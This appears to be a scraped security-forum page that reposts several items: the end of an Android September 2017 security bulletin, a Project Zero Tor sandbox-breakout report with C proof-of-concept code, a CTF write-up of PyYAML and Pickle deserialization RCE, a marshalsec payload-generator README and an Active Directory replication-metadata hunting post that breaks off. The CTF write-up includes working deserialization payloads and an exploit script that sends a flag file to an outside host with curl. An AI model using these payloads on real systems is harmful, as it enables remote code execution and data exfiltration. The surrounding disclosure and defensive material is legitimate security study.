A-35764946* ID High Memory subsystem Kernel components The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. CVE References Type Severity Component CVE-2017-8890 A-38413975 Upstream kernel RCE Critical Networking subsystem CVE-2017-9076 A-62299478 Upstream kernel EoP High Networking subsystem CVE-2017-9150 A-62199770 Upstream kernel ID High Linux kernel CVE-2017-7487 A-62070688 Upstream kernel EoP High IPX protocol driver CVE-2017-6214 A-37901268 Upstream kernel DoS High Networking subsystem CVE-2017-6346 A-37897645 Upstream kernel EoP High Linux kernel CVE-2017-5897 A-37871211 Upstream kernel ID High Networking subsystem CVE-2017-7495 A-62198330 Upstream kernel ID High File system CVE-2017-7616 A-37751399 Upstream kernel ID Moderate Linux kernel CVE-2017-12146 A-35676417 Upstream kernel EoP Moderate Linux kernel CVE-2017-0794 A-35644812* EoP Moderate SCSI driver MediaTek components The most severe vulnerability in this section could enable a local malicious application to execute arbitrary code within the context of a privileged process. CVE References Type Severity Component CVE-2017-0795 A-36198473* M-ALPS03361480 EoP High Accessory detector driver CVE-2017-0796 A-62458865* M-ALPS03353884 M-ALPS03353886 M-ALPS03353887 EoP High AUXADC driver CVE-2017-0797 A-62459766* M-ALPS03353854 EoP High Accessory detector driver CVE-2017-0798 A-36100671* M-ALPS03365532 EoP High Kernel CVE-2017-0799 A-36731602* M-ALPS03342072 EoP High Lastbus CVE-2017-0800 A-37683975* M-ALPS03302988 EoP High TEEI CVE-2017-0801 A-38447970* M-ALPS03337980 EoP High LibMtkOmxVdec CVE-2017-0802 A-36232120* M-ALPS03384818 EoP Moderate Kernel CVE-2017-0803 A-36136137* M-ALPS03361477 EoP Moderate Accessory detector driver CVE-2017-0804 A-36274676* M-ALPS03361487 EoP Moderate MMC driver Qualcomm components The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. CVE References Type Severity Component CVE-2017-11041 A-36130225* QC-CR#2053101 RCE Critical LibOmxVenc CVE-2017-10996 A-38198574 QC-CR#901529 ID High Linux kernel CVE-2017-9725 A-38195738 QC-CR#896659 EoP High Memory subsystem CVE-2017-9724 A-38196929 QC-CR#863303 EoP High Linux kernel CVE-2017-8278 A-62379474 QC-CR#2013236 EoP High Audio driver CVE-2017-10999 A-36490777* QC-CR#2010713 EoP Moderate IPA driver CVE-2017-11001 A-36815555* QC-CR#270292 ID Moderate Wi-Fi driver CVE-2017-11002 A-37712167* QC-CR#2058452 QC-CR#2054690 QC-CR#2058455 ID Moderate Wi-Fi driver CVE-2017-8250 A-62379051 QC-CR#2003924 EoP Moderate GPU driver CVE-2017-9677 A-62379475 QC-CR#2022953 EoP Moderate Audio driver CVE-2017-10998 A-38195131 QC-CR#108461 EoP Moderate Audio driver CVE-2017-9676 A-62378596 QC-CR#2016517 ID Moderate File system CVE-2017-8280 A-62377236 QC-CR#2015858 EoP Moderate WLAN driver CVE-2017-8251 A-62379525 QC-CR#2006015 EoP Moderate Camera driver CVE-2017-10997 A-33039685* QC-CR#1103077 EoP Moderate PCI driver CVE-2017-11000 A-36136563* QC-CR#2031677 EoP Moderate Camera driver CVE-2017-8247 A-62378684 QC-CR#2023513 EoP Moderate Camera driver CVE-2017-9720 A-36264696* QC-CR#2041066 EoP Moderate Camera driver CVE-2017-8277 A-62378788 QC-CR#2009047 EoP Moderate Video driver CVE-2017-8281 A-62378232 QC-CR#2015892 ID Moderate Automotive multimedia CVE-2017-11040 A-37567102* QC-CR#2038166 ID Moderate Video driver Google device updates This table contains the security patch level in the latest over-the-air update (OTA) and firmware images for Google devices. The Google device OTAs may also contain additional updates. The Google device firmware images are available on the Google Developer site. Pixel, Pixel XL, Pixel C, Nexus Player, Nexus 5X, and Nexus 6P devices will be receiving the September security patches as part of the upgrade to Android Oreo. Google device Security patch level Pixel / Pixel XL 2017-09-05 Nexus 5X 2017-09-05 Nexus 6 2017-09-05 Nexus 6P 2017-09-05 Nexus 9 2017-09-05 Nexus Player 2017-09-05 Pixel C 2017-09-05 Acknowledgements We would like to thank these researchers for their contributions: CVEs Researchers CVE-2017-11000 Baozeng Ding (@sploving), Chengming Yang, and Yang Song of Alibaba Mobile Security Group CVE-2017-0800, CVE-2017-0798 Chengming Yang, Baozeng Ding, and Yang Song of Alibaba Mobile Security Group CVE-2017-0765 Chi Zhang, Mingjian Zhou (@Mingjian_Zhou), and Xuxian Jiang of C0RE Team CVE-2017-0758 Chong Wang and 金哲 (Zhe Jin) of Chengdu Security Response Center, Qihoo 360 Technology Co. Ltd. CVE-2017-0752 Cong Zheng (@shellcong), Wenjun Hu, Xiao Zhang, and Zhi Xu of Palo Alto Networks CVE-2017-0801 Dacheng Shao, Mingjian Zhou (@Mingjian_Zhou), and Xuxian Jiang of C0RE Team CVE-2017-0775, CVE-2017-0774, CVE-2017-0771 Elphet and Gong Guang of Alpha Team, Qihoo 360 Technology Co. Ltd. CVE-2017-0784 En He (@heeeeen4x) and Bo Liu of MS509Team CVE-2017-10997 Gengjia Chen (@chengjia4574) and pjf of IceSword Lab, Qihoo 360 Technology Co. Ltd. CVE-2017-0786, CVE-2017-0792, CVE-2017-0791, CVE-2017-0790, CVE-2017-0789, CVE-2017-0788, CVE-2017-0787 Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd. CVE-2017-0802 Jake Corina and Nick Stephens of Shellphish Grill Team CVE-2017-0780 Jason Gu and Seven Shen of Trend Micro CVE-2017-0769 Mingjian Zhou (@Mingjian_Zhou), Dacheng Shao, and Xuxian Jiang of C0RE Team CVE-2017-0794, CVE-2017-9720, CVE-2017-11001, CVE-2017-10999, CVE-2017-0766 Pengfei Ding (丁鹏飞), Chenfu Bao (包沉浮), Lenx Wei (韦韬) of Baidu X-Lab (百度安全实验室) CVE-2017-0772 Seven Shen of Trend Micro CVE-2017-0757 Vasily Vasiliev CVE-2017-0768, CVE-2017-0779 Wenke Dou, Mingjian Zhou (@Mingjian_Zhou), and Xuxian Jiang of C0RE Team CVE-2017-0759 Weichao Sun of Alibaba Inc. CVE-2017-0796 Xiangqian Zhang, Chengming Yang, Baozeng Ding, and Yang Song of Alibaba Mobile Security Group CVE-2017-0753 Yangkang (@dnpushme) and hujianfei of Qihoo360 Qex Team CVE-2017-12146 Yonggang Guo (@guoygang) of IceSword Lab, Qihoo 360 Technology Co. Ltd. CVE-2017-0767 Yongke Wang and Yuebin Sun of Tencent's Xuanwu Lab CVE-2017-0804, CVE-2017-0803, CVE-2017-0799, CVE-2017-0795 Yu Pan and Yang Dai of Vulpecker Team, Qihoo 360 Technology Co. Ltd CVE-2017-0760 Zinuo Han and 金哲 (Zhe Jin) of Chengdu Security Response Center, Qihoo 360 Technology Co. Ltd. CVE-2017-0764, CVE-2017-0761, CVE-2017-0776, CVE-2017-0777 Zinuo Han of Chengdu Security Response Center, Qihoo 360 Technology Co. Ltd. Common questions and answers This section answers common questions that may occur after reading this bulletin. 1. How do I determine if my device is updated to address these issues? To learn how to check a device's security patch level, read the instructions on the Pixel and Nexus update schedule. Security patch levels of 2017-09-01 or later address all issues associated with the 2017-09-01 security patch level. Security patch levels of 2017-09-05 or later address all issues associated with the 2017-09-05 security patch level and all previous patch levels. Device manufacturers that include these updates should set the patch string level to: [ro.build.version.security_patch]:[2017-09-01] [ro.build.version.security_patch]:[2017-09-05] 2. Why does this bulletin have two security patch levels? This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level. Devices that use the 2017-09-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins. Devices that use the security patch level of 2017-09-05 or newer must include all applicable patches in this (and previous) security bulletins. Partners are encouraged to bundle the fixes for all issues they are addressing in a single update. 3. What do the entries in the Type column mean? Entries in the Type column of the vulnerability details table reference the classification of the security vulnerability. Abbreviation Definition RCE Remote code execution EoP Elevation of privilege ID Information disclosure DoS Denial of service N/A Classification not available 4. What do the entries in the References column mean? Entries under the References column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs. Prefix Reference A- Android bug ID QC- Qualcomm reference number M- MediaTek reference number N- NVIDIA reference number B- Broadcom reference number 5. What does a * next to the Android bug ID in the References column mean? Issues that are not publicly available have a * next to the Android bug ID in the References column. The update for that issue is generally contained in the latest binary drivers for Nexus devices available from the Google Developer site. Versions Version Date Notes 1.0 September 5, 2017 Bulletin published. Except as otherwise noted, the content of this page is licensed under the Creative Commons Attribution 3.0 License, and code samples are licensed under the Apache 2.0 License. For details, see our Site Policies. Java is a registered trademark of Oracle and/or its affiliates. Last updated September 5, 2017. Sursa: https://source.android.com/security/bulletin/2017-09-01
  15. kernel-exploits CVE-2016-2384: a double-free in USB MIDI driver CVE-2016-9793: a signedness issue with SO_SNDBUFFORCE and SO_RCVBUFFORCE socket options CVE-2017-6074: a double-free in DCCP protocol CVE-2017-7308: a signedness issue in AF_PACKET sockets CVE-2017-1000112: a memory corruption due to UFO to non-UFO path switch Sursa: https://github.com/xairy/kernel-exploits
  16. Tor: Linux sandbox breakout via X11 Project Member Reported by jannh@google.com, Jun 13 Back to list **EDIT: I mixed up two different sandboxes; see the comment below for a correction.** From inside the Linux sandbox described in <https://blog.torproject.org/blog/tor-browser-70-released>, it is still possible to talk to the X server without any restrictions. This means that a compromised browser can e.g. use the XTEST X protocol extension (<https://www.x.org/releases/X11R7.7/doc/xextproto/xtest.html>) to fake arbitrary keyboard and mouse events, directed at arbitrary windows. This permits a sandbox breakout, e.g. by injecting keypresses into a background window. <https://trac.torproject.org/projects/tor/wiki/doc/TorBrowser/Sandbox/Linux#HowdoIprotectmyselffromXexploits> mentions that the X server is reachable, but it sounds like the author didn't realize that a normal connection to the X server permits sandbox breakouts by design. To reproduce: Install Debian Jessie with the Xfce4 desktop environment and with backports enabled. Install bubblewrap and xdotool. Install the sandboxed Tor browser from <https://www.torproject.org/dist/torbrowser/7.0a4/sandbox-0.0.6-linux64.zip>. Launch the sandboxed Tor browser, use the default configuration. When the browser has launched, close it. Delete ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox. Store the following as ~/.local/share/sandboxed-tor-browser/tor-browser/Browser/firefox.c: ========================= #include <stdlib.h> #include <unistd.h> int main(void){ int status; setenv("LD_LIBRARY_PATH", "/home/amnesia/sandboxed-tor-browser/tor-browser", 1); if (fork() == 0) { execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "key", "alt+F2", "sleep", "1", "type", "xfce4-terminal", NULL); perror("fail"); return 0; } wait(&status); if (fork() == 0) { execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", "sleep", "1", "type", "id", NULL); perror("fail"); return 0; } wait(&status); if (fork() == 0) { execl("/home/amnesia/sandboxed-tor-browser/tor-browser/xdotool", "xdotool", "sleep", "1", "key", "Return", NULL); perror("fail"); return 0; } wait(&status); while (1) sleep(1000); return 0; } ========================= In ~/.local/share/sandboxed-tor-browser/tor-browser/Browser, run "gcc -static -o firefox firefox.c". Run "cp /usr/bin/xdotool /usr/lib/x86_64-linux-gnu/* ~/.local/share/sandboxed-tor-browser/tor-browser/". Now run the launcher for the sandboxed browser again. Inside the sandbox, the new firefox binary will connect to the X11 server and send fake keypresses to open a terminal outside the sandbox and type into it. There are probably similar issues with pulseaudio when it's enabled; I suspect that it's possible to e.g. use the pulseaudio socket to load pulseaudio modules with arbitrary parameters, which would e.g. permit leaking parts of files outside the sandbox by using them as authentication cookie files for modules that implement audio streaming over the network. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1293&desc=2
  17. Exploiting Python Deserialization Vulnerabilities Over the weekend, I had a chance to participate in the ToorConCTF (https://twitter.com/toorconctf) which gave me my first experience with serialization flaws in Python. Two of the challenges we solved included Python libraries that appeared to be accepting serialized objects and ended up being vulnerable to Remote Code Execution (RCE). Since I struggled a bit to find reference material online on the subject, I decided to make a blog post documenting my discoveries, exploit code and solutions. In this blog post, I will cover how to exploit deserialization vulnerabilities in the PyYAML (a Python YAML library) and Python Pickle libraries (a Python serialization library). Let's get started! Background Before diving into the challenges, it's probably important to start with the basics. If you are unfamilliar with deserialization vulnerabilities, the following exert from @breenmachine at Fox Glove Security (https://foxglovesecurity.com) probably explains it the best. "Unserialize vulnerabilities are a vulnerability class. Most programming languages provide built-in ways for users to output application data to disk or stream it over the network. The process of converting application data to another format (usually binary) suitable for transportation is called serialization. The process of reading data back in after it has been serialized is called unserialization. Vulnerabilities arise when developers write code that accepts serialized data from users and attempt to unserialize it for use in the program. Depending on the language, this can lead to all sorts of consequences, but most interesting, and the one we will talk about here is remote code execution." PyYAML Deserialization Remote Code Execution In the first challenge, we were presented with a URL to a web page which included a YAML document upload form. After Googling for YAML document examples, I crafted the following YAML file and proceeded to upload it to get a feel for the functionality of the form. HTTP Request POST / HTTP/1.1 Host: ganon.39586ebba722e94b.ctf.land:8001 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://ganon.39586ebba722e94b.ctf.land:8001/ Connection: close Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329 Content-Length: 857 -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="file"; filename="test.yaml" Content-Type: application/x-yaml --- # A list of global configuration variables # # Uncomment lines as needed to edit default settings. # # Note this only works for settings with default values. Some commands like --rerun <module> # # or --force-ccd n will have to be set in the command line (if you need to) # # # This line is really important to set up properly # project_path: '/home/user' # # # The rest of the settings will default to the values set unless you uncomment and change them # #resize_to: 2048 'test' -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="upload" -----------------------------200783363553063815533894329-- HTTP/1.1 200 OK Server: gunicorn/19.7.1 Date: Sun, 03 Sep 2017 02:50:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 2213 Set-Cookie: session=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/ <!-- begin message block --> <div class="container flashed-messages"> <div class="row"> <div class="col-md-12"> <div class="alert alert-info" role="alert"> test.yaml is valid YAML </div> </div> </div> </div> <!-- end message block --> </div> </div> <div class="container main" > <div class="row"> <div class="col-md-12 main"> <code></code> As you can see, the document was uploaded successfully but only displayed whether the upload was a valid YAML document or not. At this point, I wasn't sure exactly what I was supposed to do, but after looking more closely at the response, I noticed that the server was running gunicorn/19.7.1... A quick search for gunicorn revealed that it is a Python web server which lead me to believe the YAML parser was in fact a Python library. From here, I decided to search for Python YAML vulnerabilities and discovered a few blog posts referencing PyYAML deserialization flaws. It was here that I came across the following exploit code for exploiting PyYAML deserialization vulnerabilities. The important thing here is the following code which runs the 'ls' command if the application is vulnerable to PyYaml deserialization: !!map { ? !!str "goodbye" : !!python/object/apply:subprocess.check_output [ !!str "ls", ], } Going blind into the exploitation phase, I decided to give it a try and inject the payload into the document contents being uploaded using Burpsuite... HTTP Request POST / HTTP/1.1 Host: ganon.39586ebba722e94b.ctf.land:8001 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://ganon.39586ebba722e94b.ctf.land:8001/ Connection: close Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329 Content-Length: 445 -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="file"; filename="test.yaml" Content-Type: application/x-yaml --- !!map { ? !!str "goodbye" : !!python/object/apply:subprocess.check_output [ !!str "ls", ], } -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="upload" -----------------------------200783363553063815533894329-- <ul><li><code>goodbye</code> : <code>Dockerfile README.md app.py app.pyc bin boot dev docker-compose.yml etc flag.txt home lib lib64 media mnt opt proc requirements.txt root run sbin srv static sys templates test.py tmp usr var </code></li></ul> As you can see, the payload worked and we now have code execution on the target server! Now, all we need to do is read the flag.txt... I quickly discovered a limitaton of the above method was strictly limited to single commands (ie. ls, whoami, etc.) which meant there was no way to read the flag using this method. I then discovered that the os.system Python call could also be to achieve RCE and was capable of running multiple commands inline. However, I was quickly disasspointed after trying this and seeing that the result just returned "0" and I could not see my command output. After struggling to find the solution, my teamate @n0j pointed out that the os.system ["command_here" ] only returns a "0" exit code if the command is successful and is blind due to how Python handles sub process execution. It was here that I tried injecting the following command to read the flag: curl https://crowdshield.com/?`cat flag.txt` HTTP Request POST / HTTP/1.1 Host: ganon.39586ebba722e94b.ctf.land:8001 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://ganon.39586ebba722e94b.ctf.land:8001/ Connection: close Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329 Content-Length: 438 -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="file"; filename="test.yaml" Content-Type: application/x-yaml --- "goodbye": !!python/object/apply:os.system ["curl https://crowdshield.com/?`cat flag.txt`"] -----------------------------200783363553063815533894329 Content-Disposition: form-data; name="upload" -----------------------------200783363553063815533894329-- </div> <div class="container main" > <div class="row"> <div class="col-md-12 main"> <ul><li><code>goodbye</code> : <code>0</code></li></ul> </div> </div> </div> After much trial and error, the flag was ours along with 250pts in the CTF! Remote Apache Logs 34.214.16.74 - - [02/Sep/2017:21:12:11 -0700] "GET /?ItsCaptainCrunchThatsZeldasFavorite HTTP/1.1" 200 1937 "-" "curl/7.38.0" Python Pickle Deserialization In the next CTF challenge, we were provided a host and port to connect to (ganon.39586ebba722e94b.ctf.land:8000). After initial connection however, no noticable output was displayed so I proceeded to fuzz the open port with random characters and HTTP requests to see what happened. It wasn't until I tried injecting a single "'" charecter that I received the error below: # nc -v ganon.39586ebba722e94b.ctf.land 8000 ec2-34-214-16-74.us-west-2.compute.amazonaws.com [34.214.16.74] 8000 (?) open cexceptions AttributeError p0 (S"Unpickler instance has no attribute 'persistent_load'" p1 tp2 Rp3 . The thing that stood out most was the (S"Unpickler instance has no attribute 'persistent_load'" portion of the output. I immediately searched Google for the error which revealed several references to Python's serialization library called "Pickle". It soon became clear that this was likely another Python deserialization flaw in order to obtain the flag. I then searched Google for "Python Pickle deserialization exploits" and discovered a similar PoC to the code below. After tinkering with the code a bit, I had a working exploit that would send Pickle serialized objects to the target server with the commands of my choice. Exploit Code #!/usr/bin/python # Python Pickle De-serialization Exploit by 1N3@CrowdShield - https://crowdshield.com # import os import cPickle import socket import os # Exploit that we want the target to unpickle class Exploit(object): def __reduce__(self): # Note: this will only list files in your directory. # It is a proof of concept. return (os.system, ('curl https://crowdshield.com/.injectx/rce.txt?`cat flag.txt`',)) def serialize_exploit(): shellcode = cPickle.dumps(Exploit()) return shellcode def insecure_deserialize(exploit_code): cPickle.loads(exploit_code) if __name__ == '__main__': shellcode = serialize_exploit() print shellcode soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM) soc.connect(("ganon.39586ebba722e94b.ctf.land", 8000)) print soc.recv(1024) soc.send(shellcode) print soc.recv(1024) soc.close() Exploit PoC # python python_pickle_poc.py cposix system p1 (S"curl https://crowdshield.com/rce.txt?`cat flag.txt`" p2 tp3 Rp4 . Much to my surprise, this worked and I could see the contents of the flag in my Apache logs! Remote Apache Logs 34.214.16.74 - - [03/Sep/2017:11:15:02 -0700] "GET /rce.txt?UsuallyLinkPrefersFrostedFlakes HTTP/1.1" 404 2102 "-" "curl/7.38.0" Conclusion So there you have it. Two practicle examples of Python serialization which can be used to obtain Remote Code Execution (RCE) in remote applications. I had a lot of fun competing in the CTF and learned a lot in the process, but due to other obligations time constraints I wasn't able to put my entire focus into the CTF. In the end, our team "SavageSubmarine" placed 7th overall with @hackerbyhobby, @baltmane and @n0j (http://n0j.github.io/). Till next time... -1N3 Published by CrowdShield on 09/04/2017 [Blog Home] Sursa: https://crowdshield.com/blog.php?name=exploiting-python-deserialization-vulnerabilities
  18. Java Unmarshaller Security - Turning your data into code execution Paper It's been more than two years since Chris Frohoff and Garbriel Lawrence have presented their research into Java object deserialization vulnerabilities ultimately resulting in what can be readily described as the biggest wave of remote code execution bugs in Java history. Research into that matter indicated that these vulnerabilities are not exclusive to mechanisms as expressive as Java serialization or XStream, but some could possibly be applied to other mechanisms as well. This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker supplied, types and shows that no matter how this process is performed and what implicit constraints are in place it is prone to similar exploitation techniques. Full paper is at marshalsec.pdf Disclaimer All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities. Usage Java 8 required. Build using maven mvn clean package -DskipTests. Run as java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] where -a - generates/tests all payloads for that marshaller -t - runs in test mode, unmarshalling the generated payloads after generating them. -v - verbose mode, e.g. also shows the generated payload in test mode. gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. arguments - Gadget specific arguments Payload generators for the following marshallers are included: Marshaller Gadget Impact BlazeDSAMF(0|3|X) JDK only escalation to Java serialization various third party libraries RCEs Hessian|Burlap various third party RCEs Castor dependency library RCE Jackson possible JDK only RCE, various third party RCEs Java yet another third party RCE JsonIO JDK only RCE JYAML JDK only RCE Kryo third party RCEs KryoAltStrategy JDK only RCE Red5AMF(0|3) JDK only RCE SnakeYAML JDK only RCEs XStream JDK only RCEs YAMLBeans third party RCE Sursa: https://github.com/mbechler/marshalsec
  19. Will Co-founder of Empire/BloodHound/Veil-Framework | PowerSploit developer | Microsoft PowerShell MVP | Security at the misfortune of others | http://specterops.io Sep 6 Hunting With Active Directory Replication Metadata With the recent release of BloodHound’s ACL Attack Path Update as well as the work on Active Directory DACL backdooring by @_wald0 and myself (whitepaper here), I started to investigate ACL-based attack paths from a defensive perspective. Sean Metcalf has done some great work concerning Active Directory threat hunting (see his 2017 BSides Charm “Detecting the Elusive: Active Directory Threat Hunting” presentation) and I wanted to show how replication metadata can help in detecting this type of malicious activity. Also, after this post had been drafted, Grégory LUCAND pointed out to me the extensive article (in French) he authored on the same subject area titled “Metadata de réplication et analyse Forensic Active Directory (fr-FR)”. He walks through detecting changes to an OU, as well as an excellent deep dive (deeper than this article) into how some of the replication components work such as linked value replication. I highly recommend you check his post out, even if you have to use Google Translate as I did :) I’ll dive into some background concerning domain replication metadata and then will break down each ACL attack primitive and how you can hunt for these modifications. Unfortunately, replication metadata can be a bit limited, but it can at least help us narrow down the modification event that took place as well as the domain controller the event occurred on. Note: all examples here use my test domain which runs at a Windows 2012 R2 domain functional level. Other functional domain versions will vary. Also, all examples were done in a lab context, so exact behavior in a real network will vary as well. Active Directory Replication Metadata When a change is made to a domain object on a domain controller in Active Directory, those changes are replicated to other domain controllers in the same domain (see the “Directory Replication” section here). As part of the replication process, metadata about the replication is preserved in two constructed attributes, that is, attributes where the end value is calculated from other attributes. These two properties are msDS-ReplAttributeMetaData and msDS-ReplValueMetaData. Sidenote: previous work I found on replication metadata includes this article on tracking UPN modification as well as this great series of articles on different use cases for this data. These articles show how to use both REPADMIN /showobjmeta as well as the Active Directory cmdlets to enumerate and parse the XML formatted data returned. A few months ago, I pushed a PowerView commit that simplifies this enumeration process, and I’ll demonstrate these new functions throughout this post. msDS-ReplAttributeMetaData First off, how do we know which attributes are replicated? Object attributes are themselves represented in the forest schema and include a systemFlags attribute that contains various meta-settings. This includes the FLAG_ATTR_NOT_REPLICATED flag, which indicates that the given attribute should not be replicated. We can use PowerView to quickly enumerate all of these non-replicated attributes using a bitwise LDAP filter to check for this flag: Get-DomainObject -SearchBase 'ldap://CN=schema,CN=configuration,DC=testlab,DC=local' -LDAPFilter '(&(objectClass=attributeSchema)(systemFlags:1.2.840.113556.1.4.803:=1))' | Select-Object -Expand ldapdisplayname If we want attributes that ARE replicated, we can just negate the bitwise filter: Get-DomainObject -SearchBase 'ldap://CN=schema,CN=configuration,DC=testlab,DC=local' -LDAPFilter '(&(objectClass=attributeSchema)(!systemFlags:1.2.840.113556.1.4.803:=1))' | Select-Object -Expand ldapdisplayname So changes to any of the attributes in the above set on an object are replicated to other domain controllers, and, therefore, have replication metadata information in msDS-ReplAttributeMetaData (except for linked attributes, more on that shortly). Since this is a constructed attribute, we have to specify that the property be calculated during our LDAP search. Luckily, you can already do this with PowerView by specifying -Properties msDS-ReplAttributeMetaData for any of the Get-Domain* functions: You can see that we get an array of XML text blobs that describes the modification events. PowerView’s brand new Get-DomainObjectAttributeHistory function will automatically query msDS-ReplAttributeMetaData for one or more objects and parse out the XML blobs into custom PSObjects: Breaking down each result, we have the distinguished name of the object itself, the name of the replicated attribute, the last time the attribute was changed (LastOriginatingChange), the number of times the attribute has changed (Version), and the directory service agent distinguished name the change originated from (LastOriginatingDsaDN). The “Sidenote: Resolving LastOriginatingDsaDN” section at the end of this post shows how to resolve this distinguished name to the appropriate domain controller object itself. Unfortunately, we don’t get who made the change, or what the previous attribute value was; however, there are still a few interesting things things we can do with this data which I’ll show in a bit. msDS-ReplValueMetaData In order to understand msDS-ReplValueMetaData and why it’s separate from msDS-ReplAttributeMetaData, you need to understand linked attributes in Active Directory. Introduced Windows Server 2003 domain functional levels, linked value replication “allows individual values of a multivalued attribute to be replicated separately.” In English: attributes that are constructed/depend on other attributes were broken out in such a way that bits of the whole could be replicated one by one, instead of the entire grouping all at once. This was introduced in order to cut down on replication traffic in modern domain environments. With linked attributes, Active Directory calculates the value of a given attribute, referred to as the back link, from the value of another attribute, referred to as the forward link. The best example of this is member / memberof for group memberships: the member property of a group is the forward link while the memberof property of a user is the backward link. When you enumerate the memberof property for a user, the backlinks are crawled to produce the final membership set. There are two additional caveats about forward/backwards links you should be aware of. First, forward links are writable, while backlinks are not, so when a forward-linked attribute is changed the value of the associated backlink property is updated automatically. Second, because of this, only forward-linked attributes are replicated between domains, which then automatically calculate the backlinks. For more information, check out this great post on the subject. A huge advantage for us is that because forward-linked attributes are replicated in this way, the previous values of these attributes are stored in replication metadata. This is exactly what the msDS-ReplValueMetaData constructed attribute stores, again in XML format. The new Get-DomainObjectLinkedAttributeHistory PowerView function wraps this all up for you: We now know that member/memberof is a linked set, hence the modification results to member above. In order to enumerate all forward-linked attributes, we can again examine the forest schema. Linked properties have a Link and LinkID in the schema — forward links have an even/nonzero value while back links have an odd/nonzero value. We can grab the current schema with [DirectoryServices.ActiveDirectory.ActiveDirectorySchema]::GetCurrentSchema() and can then use the FindAllClasses() method to enumerate all the current schema classes. If we filter by class properties that are even, we can find all linked properties that therefore have their previous values replicated in Active Directory metadata. There are a lot of results here, but the main ones we likely care about are member/memberOf and manager/directReports, unfortunately. So member and manager are the only interesting properties for an object we can track previous modification values on. However, like with msDS-ReplAttributeMetaData, we unfortunately can’t see who actually initiated the change. Hunting With Replication Metadata Alright, so we have a bunch of this seemingly random replication metadata, how the hell do we actually use this to “find bad?” Metadata won’t magically tell you an entire story, but I believe it can start to point you in the right direction, with the added bonus of being pre-existing functionality already present in your domain. I’ll break down the process for hunting for each ACL attack primitive that @_wald0 and myself covered, but for most situations the process will be: Use Active Directory replication metadata to detect changes to object properties that might indicate malicious behavior. Collect detailed event logs from the domain controller linked to the change (as indicated by the metadata) in order to track down who performed the modification and what the value was changed to. There’s one small exception to this process: Group Membership Modification This one is the easiest. The control relationship for this is the right to add members to a group (WriteProperty to Self-Membership) and the attack primitive through PowerView is Add-DomainGroupMember. Let’s see what the information from Get-DomainObjectLinkedAttributeHistory can tell us: In the first entry, we see that ‘EvilUser’ was originally added (TimeCreated) at 21:13 and is still present (TimeDeleted == the epoch). Version being 3 means that the EvilUser was originally added at TimeCreated, deleted at some point, and then readded at 17:53 (LastOriginatingChange). Big note: these timestamps are in UTC! In the second example, TestOUUser was added to the group at 21:12 (TimeCreated) and removed at 21:19 (TimeDeleted). The Version being even, as well as the non-epoch TimeDeleted value, means that this user is no longer present in the group and was removed at the indicated time. PowerView’s last new function, Get-DomainGroupMemberDeleted, will return just metadata components indicating deleted users: If we want more details, we have the Directory System Agent (DSA) where the change originated, meaning the domain controller in this environment that handled the modification (PRIMARY here). Since we have the group that was modified (TestGroup) and the approximate time the change occurred (21:44 UTC), we can go to the domain controller that initiated the change (PRIMARY) to pull more event log detail (see the “Sidenote: Resolving LastOriginatingDsaDN” section for more detail on this process). The auditing we really want isn’t on by default, but can be enabled with “Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Account Management -> Audit Security Group Management”: This will result in event log IDs of 4735/4737/4755 for modifications to domain local, global, and universally scoped security groups: We can see in the event detail that TESTLAB\dfm.a is the principal who initiated the change, with correlates with the deletion event we observed in the replication metadata. User Service Principal Name Modification This is also another interesting case. The vast majority of users will never have a service principal name (SPN) set unless the account is registered to… run a service. SPN modification is an attack primitive that I’ve spoken about before, and grants us a great opportunity to take advantage of the “Version” field of the metadata, i.e. the number of times a property has been modified. If we set and then unset a SPN on a user, the Version associated with the attribute metadata will be even, indicating there used to be a value set: If we enable the “Audit User Account Management” and “Audit Computer Account Management” settings, we can grab more detailed information about the changes: The event ID will be 4738, but the event log detail unfortunately does not break out the value of servicePrincipalName on change. However, we do again get the principal who initiated the change: Note the logged timestamp of the event matches the LastOriginatingChange of the replication metadata. If we wanted to do a 